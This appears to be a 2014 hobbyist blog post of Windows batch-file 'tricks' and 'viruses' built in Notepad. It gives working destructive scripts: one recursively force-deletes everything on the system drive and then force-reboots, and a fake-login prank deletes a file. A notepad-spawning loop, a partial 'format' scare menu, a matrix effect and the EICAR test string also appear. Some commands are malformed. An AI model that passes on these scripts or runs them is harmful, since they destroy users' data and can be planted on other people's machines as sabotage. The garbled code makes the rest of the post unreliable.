Monday, 30 June 2014

Makes System Dead.

(UNSAFE)
 1.)Go to notepad and type the following: 
@ECHO OFF
DEL C:\ *.*|Y
 2.)Save it as "DELL.BAT"

 3.)WANT WORSE.....!!!?.... Then type/copy the following code:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
 4.)AND SAVE IT AS A .BAT FILE.

SECOND TRICK
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE!!!........ In order to create the file, follow the steps given below:

  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

  • Save the file with any name and with a ".bat" extension and close the file.

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

Sunday, 29 June 2014

MATRIX EFFECT

Just follow the steps and see the amazing matrix effect happen in your DOS window:
 1.)Open Notepad.
 2.)Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
 3.)Save the file with .bat extension like Matrix.bat
 4.)That's it. Just open the file to see the matrix effect right before your eyes!
 5.)To change the color, replace "02" of "color 02" with the following color code chart



Deleting Data

(MODERATE)

Description: Shows a fake username and password entrance area then deletes it self

    1.Go into notepad and type:

@echo off
echo If the proper username and password is not entered all files will be deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and password wrong
pause
echo Files are being deleted
pause
dir/s
del "c:up.bat" 
3. Save it as up.bat (must be this!) 

Anti-Virus Checker/Tester

You can test any of your Anti Virus programs for its effectiveness and proper working...... using a simple notepad trick.
Follow the steps below to know more:
  1.)Open Notepad.
  2.)Copy the code give below in the notepad file:



X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  3.)Save it with an .exe extension like testvirus.exe
This test is also known as E I C A R (European Institute for Computer Antivirus Research) test file.

Thursday, 26 June 2014

Simple Virus To Continuously Open Notepads

(SAFE)
1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.

@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
    
3. Now Save the file with an extension ".bat" , for e.g: "notepad.bat"
4. If you click on "notepad.bat" , it will continuously open notepads.